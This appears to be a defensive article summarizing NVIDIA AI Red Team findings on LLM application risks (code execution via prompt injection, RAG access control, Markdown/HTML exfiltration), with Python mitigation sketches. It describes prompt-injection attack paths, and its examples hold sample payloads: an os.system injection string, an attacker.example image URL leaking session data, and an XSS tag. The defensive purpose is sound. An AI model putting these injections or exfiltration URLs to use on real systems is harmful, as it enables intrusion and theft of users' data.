NVIDIA AI Red Team Reveals Critical LLM Security Risks and Practical Fixes for Developers

The NVIDIA AI Red Team (AIRT) has spent years evaluating AI-powered systems for security flaws before they go live. Their findings reveal recurring vulnerabilities in large language model (LLM) applications that, if ignored, can lead to serious breaches. Below are three critical security issues and practical steps to address them.

First, executing LLM-generated code poses a severe risk of remote code execution (RCE). Developers sometimes use unsafe functions like exec or eval to run dynamic code, such as SQL queries or data analysis scripts. However, attackers can exploit prompt injection, either directly or through obfuscation, to trick the model into generating malicious code. If that output is executed without isolation, attackers can gain full control over the system. Even complex guardrails can be bypassed through layered evasion techniques. The best defense is to avoid exec and eval entirely. Instead, interpret the LLM's output to extract intent and map it to a predefined set of safe operations. If dynamic execution is unavoidable, run it in a secure, isolated sandbox, such as one built with WebAssembly, to prevent system compromise.

Second, insecure access control in retrieval-augmented generation (RAG) systems is a major concern. RAG allows models to pull in up-to-date external data without retraining, but it introduces risks. One common flaw is improper user-level access control: sensitive documents may be accessible to users who shouldn't see them, often because permissions weren't set correctly in the original source, such as Confluence or Google Workspace, or because the RAG system uses a single over-permissioned token to fetch data. Delays in syncing permission changes can also leave data exposed. To fix this, ensure that access controls are consistently enforced at both the source and the RAG layer. Use fine-grained access policies and avoid broad read access. For example, in email-based RAG systems, allow users to select only their own emails, or limit retrieval to internal documents only. Additionally, establish authoritative data sources for sensitive topics, like HR information, and restrict access to them tightly. Implement guardrails to validate that retrieved content is relevant and safe before it's used in the prompt.

Third, rendering active content like Markdown, HTML, or hyperlinks in LLM outputs can lead to data exfiltration. Attackers can embed malicious links or images that trigger network requests to their servers when viewed. For instance, an image URL can include encoded user data in its query string, which gets logged on the attacker's server. This is especially dangerous when combined with indirect prompt injection, where the LLM is tricked into including private conversation history in a link. To prevent this, apply strict content security policies that only allow images from trusted domains. For links, show the full URL to users before they click, or disable automatic navigation so users must copy and paste the address. Sanitize all LLM output to strip out URLs, Markdown, and HTML. As a final measure, disable active content rendering in the UI entirely if security is paramount.

In summary, the most critical risks in LLM applications are executing unsafe code, weak access control in RAG systems, and rendering active content. Addressing these early in development can prevent serious security incidents. By adopting safe coding practices, enforcing strict access policies, and sanitizing outputs, developers can significantly strengthen their AI systems.
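
To make the first mitigation concrete, here is a minimal Python sketch of interpreting the model's output and mapping it onto an allow-list of predefined operations instead of passing it to exec or eval. The JSON response format, the toy tables, and the operation names are illustrative assumptions, not code from the NVIDIA post.

```python
import json

# Toy in-memory "database" standing in for whatever backend the application queries.
TABLES = {
    "sales": [{"amount": 120.0}, {"amount": 80.0}],
    "inventory": [{"amount": 42.0}],
}

def row_count(args):
    return len(TABLES[args["table"]])

def column_sum(args):
    return sum(row[args["column"]] for row in TABLES[args["table"]])

# Allow-list: the LLM may only *name* one of these operations. Its output is
# never passed to exec()/eval(), so an injected prompt cannot smuggle in code.
SAFE_OPERATIONS = {"row_count": row_count, "column_sum": column_sum}
ALLOWED_TABLES = set(TABLES)
ALLOWED_COLUMNS = {"amount"}

def dispatch_llm_request(llm_output: str):
    """Interpret structured LLM output and map it onto a predefined safe operation."""
    try:
        request = json.loads(llm_output)  # expected: {"operation": ..., "args": {...}}
    except json.JSONDecodeError:
        raise ValueError("Model output was not valid JSON; refusing to act on it.")
    if not isinstance(request, dict):
        raise ValueError("Model output was not a JSON object; refusing to act on it.")

    handler = SAFE_OPERATIONS.get(request.get("operation"))
    args = request.get("args", {})
    if handler is None:
        raise ValueError("Requested operation is not on the allow-list.")
    if args.get("table") not in ALLOWED_TABLES:
        raise ValueError("Requested table is not permitted.")
    if "column" in args and args["column"] not in ALLOWED_COLUMNS:
        raise ValueError("Requested column is not permitted.")
    return handler(args)

# A well-formed model response is executed against the allow-list...
print(dispatch_llm_request('{"operation": "column_sum", "args": {"table": "sales", "column": "amount"}}'))
# ...while an injected attempt to run arbitrary code is rejected outright.
try:
    dispatch_llm_request('{"operation": "__import__(\'os\').system(\'id\')", "args": {}}')
except ValueError as err:
    print("Blocked:", err)
```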
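
For the RAG access-control issue, the following sketch shows one way to enforce document-level permissions at the retrieval layer, assuming each indexed chunk carries the access-control list copied from its source system. The Chunk structure, the group names, and the retrieve_candidates stub are hypothetical placeholders for a real vector-store lookup.

```python
from dataclasses import dataclass, field

@dataclass
class Chunk:
    """A retrieved document chunk plus the ACL copied from the source system."""
    text: str
    source: str
    allowed_principals: set = field(default_factory=set)  # users/groups permitted to read it

def retrieve_candidates(query: str) -> list[Chunk]:
    """Stand-in for a vector-store similarity search (illustrative only)."""
    return [
        Chunk("Q3 revenue summary", "wiki/finance", {"group:finance"}),
        Chunk("Alice's salary band", "hr/compensation", {"group:hr"}),
        Chunk("Public API changelog", "docs/api", {"group:everyone"}),
    ]

def retrieve_for_user(query: str, user_principals: set) -> list[Chunk]:
    """Drop any chunk the requesting user is not entitled to see *before* it can
    reach the prompt, instead of fetching everything with one over-permissioned token."""
    return [
        chunk for chunk in retrieve_candidates(query)
        if chunk.allowed_principals & user_principals
    ]

# A user in the finance group never sees HR documents, even if they are
# semantically similar to the query.
visible = retrieve_for_user("compensation trends", {"user:bob", "group:finance", "group:everyone"})
print([c.source for c in visible])  # ['wiki/finance', 'docs/api']
```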
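
For active-content rendering, the sketch below illustrates one form of output sanitization: images from untrusted hosts are dropped, links are rewritten so the full destination URL is visible, and raw HTML is escaped before display. The regexes and the trusted-domain allow-list are deliberately simple assumptions; a production filter would need to cover more cases.

```python
import html
import re
from urllib.parse import urlparse

TRUSTED_IMAGE_HOSTS = {"images.example-company.com"}  # illustrative allow-list

MD_IMAGE = re.compile(r"!\[([^\]]*)\]\(([^)\s]+)[^)]*\)")
MD_LINK = re.compile(r"(?<!!)\[([^\]]*)\]\(([^)\s]+)[^)]*\)")

def sanitize_llm_output(text: str) -> str:
    """Reduce the data-exfiltration surface before rendering model output."""
    # 1. Drop images whose host is not explicitly trusted; attacker-supplied
    #    image URLs can smuggle conversation data out in the query string.
    def keep_trusted_images(match: re.Match) -> str:
        host = urlparse(match.group(2)).netloc
        return match.group(0) if host in TRUSTED_IMAGE_HOSTS else f"[image removed: untrusted host {host}]"
    text = MD_IMAGE.sub(keep_trusted_images, text)

    # 2. Rewrite Markdown links so the user sees the full destination URL
    #    instead of only attacker-chosen anchor text.
    text = MD_LINK.sub(lambda m: f"{m.group(1)} ({m.group(2)})", text)

    # 3. Escape raw HTML so nothing renders as active content.
    return html.escape(text, quote=False)

example = (
    "Here is your summary. "
    "![chart](https://attacker.example/pixel.png?leak=secret-session-notes) "
    "[Click here](https://attacker.example/phish) <img src=x onerror=alert(1)>"
)
print(sanitize_llm_output(example))
```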
For deeper insight into adversarial AI, consider the NVIDIA DLI course on Exploring Adversarial Machine Learning, and explore additional technical resources on AI security from NVIDIA.
